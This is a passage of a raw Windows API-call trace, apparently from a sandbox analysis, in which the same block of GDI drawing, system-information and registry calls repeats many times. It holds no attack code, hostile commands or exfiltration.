(color=0xff) returned 0x2100c0c [0017.680] CreateSolidBrush (color=0xff0000) returned 0x1100c0f [0017.680] DeleteObject (ho=0x1100c0f) returned 1 [0017.680] DeleteObject (ho=0xc7040713) returned 1 [0017.680] DeleteObject (ho=0xbd04027d) returned 1 [0017.680] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.680] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.680] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.680] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.680] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.680] BeginPath (hdc=0x0) returned 0 [0017.680] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.680] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.680] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.680] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.680] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.680] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.680] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.680] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.680] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc8040713 [0017.680] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbe04027d [0017.681] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c10 [0017.681] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c11 [0017.681] CombineRgn (hrgnDst=0x1040c10, hrgnSrc1=0xc8040713, hrgnSrc2=0xbe04027d, iMode=1) returned 1 [0017.681] CombineRgn (hrgnDst=0x1040c11, hrgnSrc1=0xc8040713, hrgnSrc2=0xbe04027d, iMode=4) returned 2 [0017.681] CreateSolidBrush (color=0xff) returned 0x2100c0f [0017.681] CreateSolidBrush (color=0xff0000) returned 0x1100c12 [0017.681] DeleteObject (ho=0x1100c12) returned 1 [0017.681] DeleteObject (ho=0xbe04027d) returned 1 [0017.681] DeleteObject (ho=0xc8040713) returned 1 [0017.681] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.681] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.681] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.681] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.681] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.681] BeginPath (hdc=0x0) returned 0 [0017.681] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.681] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.681] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.681] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.681] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.681] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.681] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.681] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.682] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbf04027d [0017.682] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc9040713 [0017.682] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c13 [0017.682] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c14 [0017.682] CombineRgn (hrgnDst=0x1040c13, hrgnSrc1=0xbf04027d, hrgnSrc2=0xc9040713, iMode=1) returned 1 [0017.682] CombineRgn (hrgnDst=0x1040c14, hrgnSrc1=0xbf04027d, hrgnSrc2=0xc9040713, iMode=4) returned 2 [0017.682] CreateSolidBrush (color=0xff) returned 0x2100c12 [0017.682] CreateSolidBrush (color=0xff0000) returned 0x1100c15 [0017.682] DeleteObject (ho=0x1100c15) returned 1 [0017.682] DeleteObject (ho=0xc9040713) returned 1 [0017.682] DeleteObject (ho=0xbf04027d) returned 1 [0017.682] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.682] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.682] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.682] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.682] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.682] BeginPath (hdc=0x0) returned 0 [0017.682] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.682] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.682] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.682] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.682] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.682] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.682] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.683] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.683] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xca040713 [0017.683] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc004027d [0017.683] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c16 [0017.683] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c17 [0017.683] CombineRgn (hrgnDst=0x1040c16, hrgnSrc1=0xca040713, hrgnSrc2=0xc004027d, iMode=1) returned 1 [0017.683] CombineRgn (hrgnDst=0x1040c17, hrgnSrc1=0xca040713, hrgnSrc2=0xc004027d, iMode=4) returned 2 [0017.683] CreateSolidBrush (color=0xff) returned 0x2100c15 [0017.683] CreateSolidBrush (color=0xff0000) returned 0x1100c18 [0017.683] DeleteObject (ho=0x1100c18) returned 1 [0017.683] DeleteObject (ho=0xc004027d) returned 1 [0017.683] DeleteObject (ho=0xca040713) returned 1 [0017.683] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.683] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.683] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.683] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.683] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.683] BeginPath (hdc=0x0) returned 0 [0017.683] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.683] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.683] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.683] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.683] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.683] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.683] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.683] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.684] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc104027d [0017.684] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcb040713 [0017.684] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c19 [0017.684] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c1a [0017.684] CombineRgn (hrgnDst=0x1040c19, hrgnSrc1=0xc104027d, hrgnSrc2=0xcb040713, iMode=1) returned 1 [0017.684] CombineRgn (hrgnDst=0x1040c1a, hrgnSrc1=0xc104027d, hrgnSrc2=0xcb040713, iMode=4) returned 2 [0017.684] CreateSolidBrush (color=0xff) returned 0x2100c18 [0017.684] CreateSolidBrush (color=0xff0000) returned 0x1100c1b [0017.684] DeleteObject (ho=0x1100c1b) returned 1 [0017.684] DeleteObject (ho=0xcb040713) returned 1 [0017.684] DeleteObject (ho=0xc104027d) returned 1 [0017.684] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.684] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.684] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.684] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.684] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.684] BeginPath (hdc=0x0) returned 0 [0017.684] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.684] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.684] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.684] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.684] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.684] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.684] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.684] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.684] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcc040713 [0017.684] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc204027d [0017.684] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c1c [0017.684] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c1d [0017.684] CombineRgn (hrgnDst=0x1040c1c, hrgnSrc1=0xcc040713, hrgnSrc2=0xc204027d, iMode=1) returned 1 [0017.685] CombineRgn (hrgnDst=0x1040c1d, hrgnSrc1=0xcc040713, hrgnSrc2=0xc204027d, iMode=4) returned 2 [0017.685] CreateSolidBrush (color=0xff) returned 0x2100c1b [0017.685] CreateSolidBrush (color=0xff0000) returned 0x1100c1e [0017.685] DeleteObject (ho=0x1100c1e) returned 1 [0017.685] DeleteObject (ho=0xc204027d) returned 1 [0017.685] DeleteObject (ho=0xcc040713) returned 1 [0017.685] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.685] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.685] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.685] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.685] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.685] BeginPath (hdc=0x0) returned 0 [0017.685] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.685] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.685] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.685] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.685] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.685] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.685] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.685] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.685] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc304027d [0017.685] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcd040713 [0017.685] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c1f [0017.685] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c20 [0017.685] CombineRgn (hrgnDst=0x1040c1f, hrgnSrc1=0xc304027d, hrgnSrc2=0xcd040713, iMode=1) returned 1 [0017.685] CombineRgn (hrgnDst=0x1040c20, hrgnSrc1=0xc304027d, hrgnSrc2=0xcd040713, iMode=4) returned 2 [0017.685] CreateSolidBrush (color=0xff) returned 0x2100c1e [0017.685] CreateSolidBrush (color=0xff0000) returned 0x1100c21 [0017.685] DeleteObject (ho=0x1100c21) returned 1 [0017.685] DeleteObject (ho=0xcd040713) returned 1 [0017.685] DeleteObject (ho=0xc304027d) returned 1 [0017.685] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.686] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.686] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.686] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.686] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.686] BeginPath (hdc=0x0) returned 0 [0017.686] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.686] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.686] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.686] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.686] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.686] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.686] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.686] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.686] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xce040713 [0017.686] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc404027d [0017.686] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c22 [0017.686] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c23 [0017.686] CombineRgn (hrgnDst=0x1040c22, hrgnSrc1=0xce040713, hrgnSrc2=0xc404027d, iMode=1) returned 1 [0017.686] CombineRgn (hrgnDst=0x1040c23, hrgnSrc1=0xce040713, hrgnSrc2=0xc404027d, iMode=4) returned 2 [0017.686] CreateSolidBrush (color=0xff) returned 0x2100c21 [0017.686] CreateSolidBrush (color=0xff0000) returned 0x1100c24 [0017.686] DeleteObject (ho=0x1100c24) returned 1 [0017.686] DeleteObject (ho=0xc404027d) returned 1 [0017.686] DeleteObject (ho=0xce040713) returned 1 [0017.686] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.687] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.687] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.687] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.687] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.687] BeginPath (hdc=0x0) returned 0 [0017.687] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.687] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.687] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.687] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.687] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.687] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.687] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.687] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.687] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc504027d [0017.687] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcf040713 [0017.687] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c25 [0017.687] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c26 [0017.687] CombineRgn (hrgnDst=0x1040c25, hrgnSrc1=0xc504027d, hrgnSrc2=0xcf040713, iMode=1) returned 1 [0017.687] CombineRgn (hrgnDst=0x1040c26, hrgnSrc1=0xc504027d, hrgnSrc2=0xcf040713, iMode=4) returned 2 [0017.687] CreateSolidBrush (color=0xff) returned 0x2100c24 [0017.687] CreateSolidBrush (color=0xff0000) returned 0x1100c27 [0017.687] DeleteObject (ho=0x1100c27) returned 1 [0017.687] DeleteObject (ho=0xcf040713) returned 1 [0017.687] DeleteObject (ho=0xc504027d) returned 1 [0017.687] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.687] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.687] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.687] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.688] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.688] BeginPath (hdc=0x0) returned 0 [0017.688] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.688] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.688] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.688] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.688] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.688] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.688] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.688] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.688] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd0040713 [0017.688] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc604027d [0017.688] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c28 [0017.688] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c29 [0017.688] CombineRgn (hrgnDst=0x1040c28, hrgnSrc1=0xd0040713, hrgnSrc2=0xc604027d, iMode=1) returned 1 [0017.688] CombineRgn (hrgnDst=0x1040c29, hrgnSrc1=0xd0040713, hrgnSrc2=0xc604027d, iMode=4) returned 2 [0017.688] CreateSolidBrush (color=0xff) returned 0x2100c27 [0017.688] CreateSolidBrush (color=0xff0000) returned 0x1100c2a [0017.688] DeleteObject (ho=0x1100c2a) returned 1 [0017.688] DeleteObject (ho=0xc604027d) returned 1 [0017.688] DeleteObject (ho=0xd0040713) returned 1 [0017.688] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.688] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.688] BeginPaint (in: hWnd=0x0, 